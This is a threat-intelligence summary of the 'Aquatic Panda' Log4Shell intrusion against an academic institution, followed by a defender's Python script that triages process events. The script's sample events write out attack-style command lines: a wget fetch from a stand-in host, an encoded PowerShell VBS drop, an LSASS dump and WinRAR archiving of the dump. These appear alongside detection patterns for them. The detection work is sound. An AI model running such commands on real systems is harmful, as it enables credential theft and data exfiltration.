December 29, 2021

Aquatic Panda

Industry: Education | Level: Operational | Source: CrowdStrike

While tracking exploitation of the Log4Shell vulnerability, CrowdStrike’s OverWatch team identified an attempted intrusion by “Aquatic Panda” against an unnamed academic institution. The investigation began with a review of suspicious activity from a Tomcat process running under a vulnerable VMware Horizon instance. The threat actor ran multiple connectivity checks through DNS lookups for a specific subdomain and attempted to execute curl and wget commands to retrieve tools; the execution of Linux commands on a Windows host running the Apache Tomcat service was itself anomalous. As the affected institution worked to mitigate the attack, OverWatch researchers continued tracking it and observed reconnaissance of system privileges and the download of additional scripts via a PowerShell Base64-encoded command that dropped three files with VBS file extensions, which, when decoded with “cscript.exe”, were identified as an EXE, a DLL and a DAT file. Credential-harvesting attempts were observed in the form of an LSASS memory dump, with WinRAR used to compress the dump for exfiltration. Eventually, the victim organization patched the vulnerable application, which stopped any further activity from Aquatic Panda.
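As an added example (not from CrowdStrike’s report or Anvilogic’s scenario content), the following Python sketches how a defender might triage Windows process-creation events for the behaviours described above: a Tomcat-hosted process launching curl/wget, an encoded PowerShell command that writes VBS files, cscript executing a VBS, an LSASS memory dump, and WinRAR archiving the dump. All event records, image names (tomcat9.exe, dumper.exe) and paths are constructed for the example.

```python
import base64
import re

# Constructed process-creation events (not from the report): parent image, child image, command line.
SAMPLE_EVENTS = [
    {"parent": "tomcat9.exe", "image": "cmd.exe",
     "cmd": "cmd.exe /c wget http://staging.example.invalid/t.bin"},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -enc " + base64.b64encode(
         "Set-Content C:\\Windows\\Temp\\a.vbs $x".encode("utf-16-le")).decode()},
    {"parent": "powershell.exe", "image": "cscript.exe",
     "cmd": r"cscript.exe C:\Windows\Temp\a.vbs"},
    {"parent": "cmd.exe", "image": "dumper.exe",            # constructed tool name
     "cmd": r"dumper.exe lsass.exe C:\Temp\l.dmp"},
    {"parent": "cmd.exe", "image": "WinRAR.exe",
     "cmd": r"WinRAR.exe a -hp C:\Temp\out.rar C:\Temp\l.dmp"},
    {"parent": "explorer.exe", "image": "notepad.exe", "cmd": "notepad.exe notes.txt"},
]


def decode_encoded_powershell(cmd):
    """Return the decoded script if cmd carries -e/-enc/-EncodedCommand, else None.
    PowerShell encodes the script as Base64 over UTF-16LE text."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(events):
    """Return (rule_name, event_index) pairs for each behaviour matched in the event list."""
    hits = []
    for i, ev in enumerate(events):
        image, cmd, parent = ev["image"].lower(), ev["cmd"], ev["parent"].lower()
        # Web-server process spawning download or DNS tooling (Linux-style commands on Windows).
        if "tomcat" in parent and re.search(r"\b(curl|wget|nslookup)\b", cmd, re.I):
            hits.append(("tomcat_spawned_download_or_dns_tool", i))
        # Encoded PowerShell whose decoded body writes a .vbs file.
        script = decode_encoded_powershell(cmd) if image == "powershell.exe" else None
        if script and ".vbs" in script.lower():
            hits.append(("encoded_powershell_drops_vbs", i))
        if image == "cscript.exe" and ".vbs" in cmd.lower():
            hits.append(("cscript_runs_vbs", i))
        # A non-LSASS process naming lsass together with a dump file path.
        if image != "lsass.exe" and "lsass" in cmd.lower() and ".dmp" in cmd.lower():
            hits.append(("lsass_memory_dump", i))
        if image in ("winrar.exe", "rar.exe") and ".dmp" in cmd.lower():
            hits.append(("winrar_compresses_dump", i))
    return hits
```

Running `triage(SAMPLE_EVENTS)` flags one behaviour per staged event and nothing for the benign notepad event; in practice the same rules would be applied to Sysmon Event ID 1 or EDR process telemetry.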

  • Anvilogic Scenario: Aquatic Panda – Behaviors